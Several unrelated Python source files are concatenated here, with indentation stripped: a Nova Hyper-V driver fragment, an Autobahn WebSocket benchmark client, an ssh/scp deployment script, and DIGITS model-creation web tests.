block_migration, migrate_data)
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
self.destroy(context, instance, network_info, block_device_info)
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
self._livemigrationops.pre_live_migration(context, instance,
block_device_info,
network_info)
def post_live_migration(self, context, instance, block_device_info,
migrate_data=None):
self._livemigrationops.post_live_migration(context, instance,
block_device_info)
def post_live_migration_at_destination(self, context, instance,
network_info,
block_migration=False,
block_device_info=None):
self._livemigrationops.post_live_migration_at_destination(
context,
instance,
network_info,
block_migration)
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
return self._livemigrationops.check_can_live_migrate_destination(
context, instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
self._livemigrationops.check_can_live_migrate_destination_cleanup(
context, dest_check_data)
def check_can_live_migrate_source(self, context, instance,
dest_check_data, block_device_info=None):
return self._livemigrationops.check_can_live_migrate_source(
context, instance, dest_check_data)
def get_instance_disk_info(self, instance, block_device_info=None):
pass
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
msg = _("VIF plugging is not supported by the Hyper-V driver.")
raise NotImplementedError(msg)
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
msg = _("VIF unplugging is not supported by the Hyper-V driver.")
raise NotImplementedError(msg)
def ensure_filtering_rules_for_instance(self, instance, network_info):
LOG.debug("ensure_filtering_rules_for_instance called",
instance=instance)
def unfilter_instance(self, instance, network_info):
LOG.debug("unfilter_instance called", instance=instance)
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None,
timeout=0, retry_interval=0):
return self._migrationops.migrate_disk_and_power_off(context,
instance, dest,
flavor,
network_info,
block_device_info,
timeout,
retry_interval)
def confirm_migration(self, migration, instance, network_info):
self._migrationops.confirm_migration(migration, instance, network_info)
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
self._migrationops.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
self._migrationops.finish_migration(context, migration, instance,
disk_info, network_info,
image_meta, resize_instance,
block_device_info, power_on)
def get_host_ip_addr(self):
return self._hostops.get_host_ip_addr()
def get_host_uptime(self):
return self._hostops.get_host_uptime()
def get_rdp_console(self, context, instance):
return self._rdpconsoleops.get_rdp_console(instance)
def get_console_output(self, context, instance):
return self._vmops.get_console_output(instance)
|
|
###############################################################################
##
## Copyright 2012-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ['startClient', 'startServer']
import sys, json, pprint
from twisted.internet import reactor
from autobahn.websocket import WebSocketClientFactory, \
WebSocketClientProtocol, \
connectWS
from autobahn.util import newid
class WsPerfControlProtocol(WebSocketClientProtocol):
"""
A client for wsperf running in server mode.
stress_test:
token: Token included in test results.
uri: WebSocket URI of testee.
handshake_delay: Delay in ms between opening new WS connections. What about failed connection attempts?
connection_count: How many WS connections to open. Definitely opened, or excluding failed?
con_duration: How long the WS sits idle before closing the WS. How does that work if msg_count > 0?
con_lifetime: ?
msg_count: Number of messages per WS connection.
msg_size: Size of each message.
msg_mode: ?
?: ? Any other? What about the other parameters available in message_test?
"""
WSPERF_CMDS = {"echo": """message_test:uri=%(uri)s;token=%(token)s;size=%(size)d;count=%(count)d;quantile_count=%(quantile_count)d;timeout=%(timeout)d;binary=%(binary)s;sync=%(sync)s;rtts=%(rtts)s;correctness=%(correctness)s;""",
"stress": """stress_test:uri=%(uri)s;token=%(token)s;handshake_delay=%(handshake_delay)d;connection_count=%(connection_count)d;%(con_duration)d;msg_count=%(msg_count)d;msg_size=%(msg_size)d;rtts=%(rtts)s;"""
}
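# For illustration, an "echo" command rendered from the template above with
# made-up values looks like:
#   message_test:uri=ws://127.0.0.1:9002;token=demo;size=64;count=1000;
#   quantile_count=10;timeout=10000;binary=false;sync=true;rtts=false;
#   correctness=exact;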
def sendNext(self):
if self.currentTestset == len(self.testsets):
return True
else:
if self.currentTest == len(self.testsets[self.currentTestset][1]):
self.currentTestset += 1
self.currentTest = 0
return self.sendNext()
else:
test = self.testsets[self.currentTestset][1][self.currentTest]
cmd = self.WSPERF_CMDS[test['mode']] % test
if self.factory.debugWsPerf:
print "Starting test for testee %s" % test['name']
print cmd
sys.stdout.write('.')
self.sendMessage(cmd)
self.currentTest += 1
return False
def setupTests(self):
i = 0
cnt = 0
for testset in self.factory.spec['testsets']:
self.testsets.append((testset, []))
for server in self.factory.spec['servers']:
for case in testset['cases']:
id = newid()
if testset['mode'] == 'echo':
test = {'token': id,
'mode': testset['mode'],
'uri': server['uri'].encode('utf8'),
'name': server['name'].encode('utf8'),
'quantile_count': testset['options']['quantile_count'],
'rtts': 'true' if testset['options']['rtts'] else 'false',
'count': case['count'] if case.has_key('count') else testset['options']['count'],
'size': case['size'] if case.has_key('size') else testset['options']['size'],
'timeout': case['timeout'] if case.has_key('timeout') else testset['options']['timeout'],
'binary': 'true' if (case['binary'] if case.has_key('binary') else testset['options']['binary']) else 'false',
'sync': 'true' if (case['sync'] if case.has_key('sync') else testset['options']['sync']) else 'false',
'correctness': 'exact' if (case['verify'] if case.has_key('verify') else testset['options']['verify']) else 'length'
}
else:
raise Exception("unknown mode %s" % testset['mode'])
self.testsets[i][1].append(test)
cnt += 1
i += 1
sys.stdout.write("Running %d tests in total against %d servers: " % (cnt, len(self.factory.spec['servers'])))
def toMicroSec(self, value, digits = 0):
return ("%." + str(digits) + "f") % round(float(value), digits)
def getMicroSec(self, result, field, digits = 0):
return self.toMicroSec(result['data'][field], digits)
def onTestsComplete(self):
print " All tests finished."
print
if self.factory.debugWsPerf:
self.pp.pprint(self.testresults)
for testset in self.testsets:
if testset[0]['options'].has_key('outfile'):
outfilename = testset[0]['options']['outfile']
outfile = open(outfilename, 'w')
else:
outfilename = None
outfile = sys.stdout
if testset[0]['options'].has_key('digits'):
digits = testset[0]['options']['digits']
else:
digits = 0
if testset[0]['options'].has_key('sep'):
sep = testset[0]['options']['sep']
else:
sep = "\t"
if testset[0]['mode'] == 'echo':
outfile.write(sep.join(['name', 'outcome', 'count', 'size', 'min', 'median', 'max', 'avg', 'stddev']))
quantile_count = testset[0]['options']['quantile_count']
for i in xrange(quantile_count):
outfile.write(sep)
outfile.write("q%d" % i)
outfile.write('\n')
for test in testset[1]:
result = self.testresults[test['token']]
outcome = result['data']['result']
if outcome == 'connection_failed':
outfile.write(sep.join([test['name'], 'UNREACHABLE']))
outfile.write('\n')
elif outcome == 'time_out':
outfile.write(sep.join([test['name'], 'TIMEOUT']))
outfile.write('\n')
elif outcome == 'fail':
outfile.write(sep.join([test['name'], 'FAILED']))
outfile.write('\n')
elif outcome == 'pass':
outfile.write(sep.join([str(x) for x in [test['name'],
'PASSED',
test['count'],
test['size'],
self.getMicroSec(result, 'min', digits),
self.getMicroSec(result, 'median', digits),
self.getMicroSec(result, 'max', digits),
self.getMicroSec(result, 'avg', digits),
self.getMicroSec(result, 'stddev', digits),
]]))
for i in xrange(quantile_count):
outfile.write(sep)
if result['data'].has_key('quantiles'):
outfile.write(self.toMicroSec(result['data']['quantiles'][i][1]))
outfile.write('\n')
else:
raise Exception("unknown case outcome '%s'" % outcome)
if outfilename:
outfile.close()
print "Test data written to %s." % outfilename
else:
raise Exception("logic error")
reactor.stop()
def onOpen(self):
self.pp = pprint.PrettyPrinter(indent = 3)
self.testresults = {}
self.testsets = []
self.currentTestset = 0
self.currentTest = 0
self.setupTests()
self.sendNext()
def onMessage(self, msg, binary):
if not binary:
try:
o = json.loads(msg)
if o['type'] == u'test_complete':
if self.sendNext():
self.onTestsComplete()
elif o['type'] == u'test_data':
if self.factory.debugWsPerf:
self.pp.pprint(o)
self.testresults[o['token']] = o
except ValueError, e:
pass
class WsPerfControlFactory(WebSocketClientFactory):
protocol = WsPerfControlProtocol
def startClient(wsuri, spec, debug = False):
factory = WsPerfControlFactory(wsuri)
factory.spec = spec
factory.debugWsPerf = spec['options']['debug']
connectWS(factory)
return True
|
|
#!/usr/bin/python
from subprocess import check_output, call, CalledProcessError
from re import split as regx_split
import argparse
def main():
args = process_args()
output = check_output(['git', 'status', '--porcelain', '-uno'])
filelist = output.split('\n')
for staged_file in filelist:
if staged_file:
if not deploy_code(staged_file, args):
print('An error occurred. Exiting.')
return
def process_args():
arg_parser = argparse.ArgumentParser(description='deploy.py')
arg_parser.add_argument('host_address',
action='store',
help='The remote user and host address, e.g. ubuntu@ip_address.')
arg_parser.add_argument('git_root_path',
action='store',
help='The full path of remote git repository.')
arg_parser.add_argument('--port',
action='store',
default='22',
metavar='Port Number',
help='The port number of remote machine. Default is 22.')
arg_parser.add_argument('--force',
action='store_true',
help='Force deploy. Bypass the file permission.')
arg_parser.add_argument('--public_key',
action='store',
default='',
metavar='Public Key',
help='The public key for logging in.')
return arg_parser.parse_args()
def deploy_code(staged_file, args):
if staged_file.startswith('MM') or staged_file.startswith(' '):
print('Please stage your file correctly.')
return False
if staged_file.startswith('R'):
filename, new_filename = staged_file[3:].split(' -> ')
deal_with_renaming(args, filename, new_filename)
elif staged_file.startswith('M'):
filename = staged_file[3:]
deal_with_modification(args, filename)
elif staged_file.startswith('A'):
filename = staged_file[3:]
deal_with_add(args, filename)
else:
print('Unsupported action. Pass.')
return True
def deal_with_renaming(args, filename, new_filename):
prefix_sudo = ''
should_recover_permission = False
if args.force:
original_permission, _, _ = seize_control(args, filename, 'f')
prefix_sudo = 'sudo su - -c '
should_recover_permission = True
print('Rename ' + filename + ' to ' + new_filename)
cmd = create_ssh_command(args.port,
args.host_address,
args.public_key,
True,
prefix_sudo + '"mv ' + args.git_root_path + filename + ' ' + args.git_root_path + new_filename +'"')
call(cmd)
filename = new_filename
if should_recover_permission:
change_file_permission(args.host_address,
args.port,
args.git_root_path,
filename, str(original_permission),
args.public_key)
def deal_with_modification(args, filename):
should_recover_permission = False
if args.force:
original_permission, _, _ = seize_control(args, filename, 'f')
should_recover_permission = True
print('scp ' + filename + ' to ' + args.git_root_path)
scp(args.port,
filename,
args.host_address + ':' + args.git_root_path + filename,
args.public_key)
if should_recover_permission:
change_file_permission(args.host_address,
args.port,
args.git_root_path,
filename, str(original_permission),
args.public_key)
def deal_with_add(args, filename):
try:
cmd = create_ssh_command(args.port,
args.host_address,
args.public_key,
False,
'ls ' + args.git_root_path + filename)
ls_output = check_output(cmd)
print(ls_output.rstrip() + ': already exists. Replace it.')
deal_with_modification(args, filename)
except CalledProcessError:
should_recover_permission = False
dirpath = ''
if args.force:
path_list = filename.rsplit('/', 1)
if len(path_list) > 1:
dirpath = path_list[0]
dir_permission, dir_owner, dir_group = seize_control(args, dirpath, 'd')
should_recover_permission = True
print('scp ' + filename + ' to ' + args.git_root_path)
scp(args.port,
filename,
args.host_address + ':' + args.git_root_path + filename,
args.public_key)
change_file_owngrp(args.host_address,
args.port,
args.git_root_path,
filename, dir_owner, dir_group, args.public_key)
if should_recover_permission:
change_file_permission(args.host_address,
args.port,
args.git_root_path,
dirpath, str(dir_permission), args.public_key)
def seize_control(args, target, type_):
permission = 0
if type_ == 'f':
ls_cmd = 'ls -al ' + args.git_root_path + target
elif type_ == 'd':
ls_cmd = 'ls -ald ' + args.git_root_path + target
else:
raise ValueError('Unsupported type: %r' % type_)
cmd = create_ssh_command(args.port,
args.host_address,
args.public_key,
False,
ls_cmd)
ls_output = check_output(cmd)
permission, owner, group = ls_parser(ls_output)
permission = permission_parser(permission)
change_file_permission(args.host_address,
args.port,
args.git_root_path,
target, '777', args.public_key)
return permission, owner, group
def ls_parser(ls_output):
permission, _, owner, group, _, _, _, _, _, _ = regx_split('\s+', ls_output)
return permission, owner, group
def permission_parser(permission_str):
permission = 0
permission_map = {
'r': 4,
'w': 2,
'x': 1,
'-': 0
}
for i in range(len(permission_str)):
if i == 0:
continue
elif i == 4 or i == 7:
permission *= 10
permission += permission_map[permission_str[i]]
return permission
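# A minimal worked example of the parser above (illustrative, unused
# helper): each rwx triplet maps to an octal-style digit (r=4, w=2, x=1)
# and the leading file-type character at index 0 is skipped.
def _demo_permission_parser():
    assert permission_parser('-rwxr-x--x') == 751
    assert permission_parser('drwxr-xr-x') == 755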
def change_file_permission(host_address, port, git_root_path, filename, permission_str, public_key):
cmd = create_ssh_command(port,
host_address,
public_key,
True,
'sudo su - -c "chmod ' + permission_str + ' ' + git_root_path + filename + '"')
call(cmd)
def change_file_owngrp(host_address, port, git_root_path, filename, own_str, grp_str, public_key):
cmd = create_ssh_command(port,
host_address,
public_key,
True,
'sudo su - -c "chown ' + own_str + ':' + grp_str + ' ' + git_root_path + filename + '"')
call(cmd)
def create_ssh_command(port, host_address, public_key, is_sudo, command):
final_command = ['ssh']
if public_key:
final_command += ['-i', public_key]
final_command += ['-p', port]
if is_sudo:
final_command.append('-t')
final_command.append(host_address)
final_command.append(command)
# print final_command
return final_command
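# Illustrative sketch of the command list built above (hypothetical
# values):
#
#   >>> create_ssh_command('22', 'ubuntu@10.0.0.5', '', True, 'ls /srv')
#   ['ssh', '-p', '22', '-t', 'ubuntu@10.0.0.5', 'ls /srv']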
def scp(port, source, dest, public_key):
cmd = ['scp']
if public_key:
cmd += ['-i', public_key]
cmd += ['-P', port]
cmd.append(source)
cmd.append(dest)
# print cmd
call(cmd)
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2015-2017, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
import itertools
import json
import numpy as np
import os
import PIL.Image
import tempfile
import time
import unittest
# Find the best implementation available
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from bs4 import BeautifulSoup
from digits import extensions
from digits.config import config_value
import digits.dataset.images.generic.test_views
import digits.dataset.generic.test_views
import digits.test_views
from digits import test_utils
import digits.webapp
# May be too short on a slow system
TIMEOUT_DATASET = 45
TIMEOUT_MODEL = 60
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(digits.test_views.BaseViewsTest):
"""
Provides some functions
"""
CAFFE_NETWORK = \
"""
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scale"
power_param {
scale: 0.004
}
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scale"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
exclude { stage: "deploy" }
}
"""
TORCH_NETWORK = \
"""
return function(p)
local nDim = 1
if p.inputShape then p.inputShape:apply(function(x) nDim=nDim*x end) end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer = nn.Linear(nDim, 2)
linearLayer.weight:fill(0)
linearLayer.bias:fill(0)
net:add(linearLayer) -- c*h*w -> 2
return {
model = net,
loss = nn.MSECriterion(),
}
end
"""
@classmethod
def model_exists(cls, job_id):
return cls.job_exists(job_id, 'models')
@classmethod
def model_status(cls, job_id):
return cls.job_status(job_id, 'models')
@classmethod
def abort_model(cls, job_id):
return cls.abort_job(job_id, job_type='models')
@classmethod
def model_wait_completion(cls, job_id, **kwargs):
kwargs['job_type'] = 'models'
if 'timeout' not in kwargs:
kwargs['timeout'] = TIMEOUT_MODEL
return cls.job_wait_completion(job_id, **kwargs)
@classmethod
def delete_model(cls, job_id):
return cls.delete_job(job_id, job_type='models')
@classmethod
def network(cls):
return cls.TORCH_NETWORK if cls.FRAMEWORK == 'torch' else cls.CAFFE_NETWORK
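    # FRAMEWORK itself is expected to be supplied by the test_utils mixins
    # (CaffeMixin / TorchMixin) combined into the concrete Test* classes below.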
class BaseViewsTestWithAnyDataset(BaseViewsTest):
"""
Provides a dataset
This is a common interface to work with either "images/generic"
datasets or "generic" datasets. The dataset type to use is chosen
further down in the class hierarchy, see e.g. BaseViewsTestWithDataset
"""
# Inherited classes may want to override these attributes
CROP_SIZE = None
TRAIN_EPOCHS = 3
LR_POLICY = None
LEARNING_RATE = None
BATCH_SIZE = 10
@classmethod
def setUpClass(cls, **kwargs):
super(BaseViewsTestWithAnyDataset, cls).setUpClass(**kwargs)
cls.created_models = []
@classmethod
def tearDownClass(cls):
        # delete any created models
for job_id in cls.created_models:
cls.delete_model(job_id)
super(BaseViewsTestWithAnyDataset, cls).tearDownClass()
@classmethod
def create_model(cls, learning_rate=None, **kwargs):
"""
Create a model
Returns the job_id
        Raises RuntimeError if the job fails to create
Keyword arguments:
**kwargs -- data to be sent with POST request
"""
if learning_rate is None:
learning_rate = cls.LEARNING_RATE
data = {
'model_name': 'test_model',
'group_name': 'test_group',
'dataset': cls.dataset_id,
'method': 'custom',
'custom_network': cls.network(),
'batch_size': cls.BATCH_SIZE,
'train_epochs': cls.TRAIN_EPOCHS,
'random_seed': 0xCAFEBABE,
'framework': cls.FRAMEWORK,
}
if cls.CROP_SIZE is not None:
data['crop_size'] = cls.CROP_SIZE
if cls.LR_POLICY is not None:
data['lr_policy'] = cls.LR_POLICY
if learning_rate is not None:
data['learning_rate'] = learning_rate
data.update(kwargs)
request_json = data.pop('json', False)
url = '/models/images/generic'
if request_json:
url += '.json'
rv = cls.app.post(url, data=data)
if request_json:
if rv.status_code != 200:
print json.loads(rv.data)
raise RuntimeError('Model creation failed with %s' % rv.status_code)
data = json.loads(rv.data)
if 'jobs' in data.keys():
return [j['id'] for j in data['jobs']]
else:
return data['id']
# expect a redirect
if not 300 <= rv.status_code <= 310:
print 'Status code:', rv.status_code
s = BeautifulSoup(rv.data, 'html.parser')
div = s.select('div.alert-danger')
if div:
print div[0]
else:
print rv.data
            raise RuntimeError('Failed to create model - status %s' % rv.status_code)
job_id = cls.job_id_from_response(rv)
assert cls.model_exists(job_id), 'model not found after successful creation'
cls.created_models.append(job_id)
return job_id
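    # Typical invocations, as exercised by the tests below (illustrative only):
    #   job_id = cls.create_model()                  # HTML flow, returns a job id
    #   job_id = cls.create_model(json=True)         # JSON flow
    #   job_ids = cls.create_model(json=True, learning_rate='[0.01, 0.02]')
    #                                                # sweeps return a list of ids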
class BaseViewsTestWithDataset(BaseViewsTestWithAnyDataset,
digits.dataset.images.generic.test_views.BaseViewsTestWithDataset):
"""
This inherits from BaseViewsTestWithAnyDataset and
digits.dataset.images.generic.test_views.BaseViewsTestWithDataset
in order to provide an interface to test models on "images/generic" datasets
"""
pass
class BaseViewsTestWithModelWithAnyDataset(BaseViewsTestWithAnyDataset):
"""
Provides a model
"""
@classmethod
def setUpClass(cls, **kwargs):
use_mean = kwargs.pop('use_mean', None)
super(BaseViewsTestWithModelWithAnyDataset, cls).setUpClass(**kwargs)
cls.model_id = cls.create_model(json=True, use_mean=use_mean)
assert cls.model_wait_completion(cls.model_id) == 'Done', 'create failed'
class BaseTestViews(BaseViewsTest):
"""
Tests which don't require a dataset or a model
"""
def test_page_model_new(self):
rv = self.app.get('/models/images/generic/new')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'New Image Model' in rv.data, 'unexpected page format'
def test_nonexistent_model(self):
assert not self.model_exists('foo'), "model shouldn't exist"
def test_view_config(self):
extension = extensions.view.get_default_extension()
rv = self.app.get('/models/view-config/%s' % extension.get_id())
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
def test_visualize_network(self):
rv = self.app.post('/models/visualize-network?framework=' + self.FRAMEWORK,
data={'custom_network': self.network()}
)
s = BeautifulSoup(rv.data, 'html.parser')
        if rv.status_code != 200:
            body = s.select('body')[0]
if 'InvocationException' in str(body):
raise unittest.SkipTest('GraphViz not installed')
raise AssertionError('POST failed with %s\n\n%s' % (rv.status_code, body))
        image = s.select('img')
        assert image, "didn't return an image"
class BaseTestCreation(BaseViewsTestWithDataset):
"""
Model creation tests
"""
def test_create_json(self):
job_id = self.create_model(json=True)
self.abort_model(job_id)
def test_create_delete(self):
job_id = self.create_model()
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
def test_create_wait_delete(self):
job_id = self.create_model()
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
def test_create_abort_delete(self):
job_id = self.create_model()
assert self.abort_model(job_id) == 200, 'abort failed'
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
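    # snapshot_interval is specified in epochs; the test names below appear to
    # describe the resulting snapshot rate: an interval of 0.5 over the default
    # 3 epochs produces several snapshots (2 per epoch), while an interval of 2
    # over 4 epochs produces exactly 2 (0.5 per epoch).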
def test_snapshot_interval_2(self):
job_id = self.create_model(snapshot_interval=0.5)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
rv = self.app.get('/models/%s.json' % job_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']) > 1, 'should take >1 snapshot'
def test_snapshot_interval_0_5(self):
job_id = self.create_model(train_epochs=4, snapshot_interval=2)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
rv = self.app.get('/models/%s.json' % job_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']) == 2, 'should take 2 snapshots'
@unittest.skipIf(
not config_value('gpu_list'),
'no GPUs selected')
@unittest.skipIf(
not config_value('caffe')['cuda_enabled'],
'CUDA disabled')
@unittest.skipIf(
config_value('caffe')['multi_gpu'],
'multi-GPU enabled')
def test_select_gpu(self):
for index in config_value('gpu_list').split(','):
yield self.check_select_gpu, index
def check_select_gpu(self, gpu_index):
job_id = self.create_model(select_gpu=gpu_index)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
@unittest.skipIf(
not config_value('gpu_list'),
'no GPUs selected')
@unittest.skipIf(
not config_value('caffe')['cuda_enabled'],
'CUDA disabled')
@unittest.skipIf(
not config_value('caffe')['multi_gpu'],
'multi-GPU disabled')
def test_select_gpus(self):
# test all possible combinations
gpu_list = config_value('gpu_list').split(',')
for i in xrange(len(gpu_list)):
for combination in itertools.combinations(gpu_list, i + 1):
yield self.check_select_gpus, combination
def check_select_gpus(self, gpu_list):
job_id = self.create_model(select_gpus_list=','.join(gpu_list), batch_size=len(gpu_list))
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
def infer_one_for_job(self, job_id):
        # carry out a single-image inference test for the given job
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one?job_id=%s' % job_id,
data={
'image_file': image_upload,
'show_visualizations': 'y',
}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
def test_infer_one_mean_image(self):
# test the creation
job_id = self.create_model(use_mean='image')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_infer_one_mean_pixel(self):
# test the creation
job_id = self.create_model(use_mean='pixel')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_infer_one_mean_none(self):
# test the creation
job_id = self.create_model(use_mean='none')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_retrain(self):
job1_id = self.create_model()
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
        assert len(content['snapshots']), 'should have at least one snapshot'
options = {
'method': 'previous',
'previous_networks': job1_id,
}
options['%s-snapshot' % job1_id] = content['snapshots'][-1]
job2_id = self.create_model(**options)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
def test_retrain_twice(self):
# retrain from a job which already had a pretrained model
job1_id = self.create_model()
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
        assert len(content['snapshots']), 'should have at least one snapshot'
options_2 = {
'method': 'previous',
'previous_networks': job1_id,
}
options_2['%s-snapshot' % job1_id] = content['snapshots'][-1]
job2_id = self.create_model(**options_2)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
options_3 = {
'method': 'previous',
'previous_networks': job2_id,
}
options_3['%s-snapshot' % job2_id] = -1
job3_id = self.create_model(**options_3)
assert self.model_wait_completion(job3_id) == 'Done', 'third job failed'
def test_diverging_network(self):
if self.FRAMEWORK == 'caffe':
raise unittest.SkipTest('Test not implemented for Caffe')
job_id = self.create_model(json=True, learning_rate=1e15)
assert self.model_wait_completion(job_id) == 'Error', 'job should have failed'
job_info = self.job_info_html(job_id=job_id, job_type='models')
assert 'Try decreasing your learning rate' in job_info
def test_clone(self):
options_1 = {
'shuffle': True,
'lr_step_size': 33.0,
'previous_networks': 'None',
'lr_inv_power': 0.5,
'lr_inv_gamma': 0.1,
'lr_poly_power': 3.0,
'lr_exp_gamma': 0.95,
'use_mean': 'image',
'custom_network_snapshot': '',
'lr_multistep_gamma': 0.5,
'lr_policy': 'step',
'crop_size': None,
'val_interval': 3.0,
'random_seed': 123,
'learning_rate': 0.01,
'standard_networks': 'None',
'lr_step_gamma': 0.1,
'lr_sigmoid_step': 50.0,
'lr_sigmoid_gamma': 0.1,
'lr_multistep_values': '50,85',
'solver_type': 'SGD',
}
job1_id = self.create_model(**options_1)
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content1 = json.loads(rv.data)
# Clone job1 as job2
options_2 = {
'clone': job1_id,
}
job2_id = self.create_model(**options_2)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
rv = self.app.get('/models/%s.json' % job2_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content2 = json.loads(rv.data)
# These will be different
content1.pop('id')
content2.pop('id')
content1.pop('directory')
content2.pop('directory')
content1.pop('creation time')
content2.pop('creation time')
content1.pop('job id')
content2.pop('job id')
assert (content1 == content2), 'job content does not match'
job1 = digits.webapp.scheduler.get_job(job1_id)
job2 = digits.webapp.scheduler.get_job(job2_id)
assert (job1.form_data == job2.form_data), 'form content does not match'
class BaseTestCreatedWithAnyDataset(BaseViewsTestWithModelWithAnyDataset):
"""
Tests on a model that has already been created
"""
def test_save(self):
job = digits.webapp.scheduler.get_job(self.model_id)
assert job.save(), 'Job failed to save'
def test_get_snapshot(self):
job = digits.webapp.scheduler.get_job(self.model_id)
task = job.train_task()
f = task.get_snapshot(-1)
assert f, "Failed to load snapshot"
filename = task.get_snapshot_filename(-1)
assert filename, "Failed to get filename"
def test_download(self):
for extension in ['tar', 'zip', 'tar.gz', 'tar.bz2']:
yield self.check_download, extension
def check_download(self, extension):
url = '/models/%s/download.%s' % (self.model_id, extension)
rv = self.app.get(url)
assert rv.status_code == 200, 'download "%s" failed with %s' % (url, rv.status_code)
def test_index_json(self):
rv = self.app.get('/index.json')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
found = False
for m in content['models']:
if m['id'] == self.model_id:
found = True
break
assert found, 'model not found in list'
def test_model_json(self):
rv = self.app.get('/models/%s.json' % self.model_id)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert content['id'] == self.model_id, 'expected different job_id'
assert len(content['snapshots']) > 0, 'no snapshots in list'
def test_edit_name(self):
        status = self.edit_job(
            self.model_id,
            name='new name'
        )
assert status == 200, 'failed with %s' % status
def test_edit_notes(self):
        status = self.edit_job(
            self.model_id,
            notes='new notes'
        )
assert status == 200, 'failed with %s' % status
def test_infer_one(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one?job_id=%s' % self.model_id,
data={
'image_file': image_upload,
'show_visualizations': 'y',
}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
def test_infer_one_json(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data={
'image_file': image_upload,
}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
assert data['outputs']['output'][0][0] > 0 and \
data['outputs']['output'][0][1] > 0, \
'image regression result is wrong: %s' % data['outputs']['output']
def test_infer_many(self):
# use the same image twice to make a list of two images
textfile_images = '%s\n%s\n' % (self.test_image, self.test_image)
# StringIO wrapping is needed to simulate POST file upload.
file_upload = (StringIO(textfile_images), 'images.txt')
rv = self.app.post(
'/models/images/generic/infer_many?job_id=%s' % self.model_id,
data={'image_list': file_upload}
)
